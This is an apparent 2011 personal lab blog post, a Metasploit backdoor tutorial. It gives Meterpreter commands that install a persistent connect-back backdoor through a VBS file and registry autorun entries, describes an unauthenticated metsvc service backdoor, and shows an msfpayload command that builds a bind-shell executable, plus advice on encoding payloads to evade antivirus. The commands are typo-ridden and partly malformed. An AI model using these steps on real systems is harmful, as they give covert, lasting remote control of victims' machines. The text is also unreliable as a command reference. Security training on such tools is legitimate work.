Friday, June 17, 2011

Metasploit Backdoor Tutorial

Backdoor:
Create persistence backdoor
Can be configured to connect back on systemboot or user login
Time can be set between connect back attemps
Under the hood
    Create vbs file on the victim and excute it
    Add registry entries so it is autorun
Can be uninstalled remotely
    Vbs file delete manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10

Metsvc backdoor
Run as service on the victim
Connect to it remotely
    No authentication required
Can be remotely unintalled
    File need delete manually
Less noisy compared to persistence
    Attacker can connect when he wants
Can be found by portscaning
Demo: Backdoor with Metsvc



Create Executable from payloads
Msfpayload
Use: msfpayload [var=val] [S]umamry|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecuate|[D]ll|[V]BA|[W]ar;
Ex:
msfpayload windows/meterprete/bind_tcp RHOST=192.168.1.100 X | bind_tcp.exe
Encoding to obfucate payload
Encode payload to eavde detection
Encode payload to ensure that payload will work
    Removing NULL
Msfencode can be used in conjunction with msfpayloadDemo:
Create backdoor executalbe:




Encode backdoor:



Or:
Backdoor with metsvc: http://www.mediafire.com/?1z8zi4293w2zbnp
Create backdoor with msfpayload: http://www.mediafire.com/?w69fgypdx8f1lpp
Encode backdoor: http://www.mediafire.com/?z9jkk66gt6z4pm9

------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more. 

No comments:

Install Xposed Inspector and Frida on Genymotion

Today i had some work with android. So i need trace application. I found 2 nice tool can help me: Xposed Inspector and Frida. To setup ther...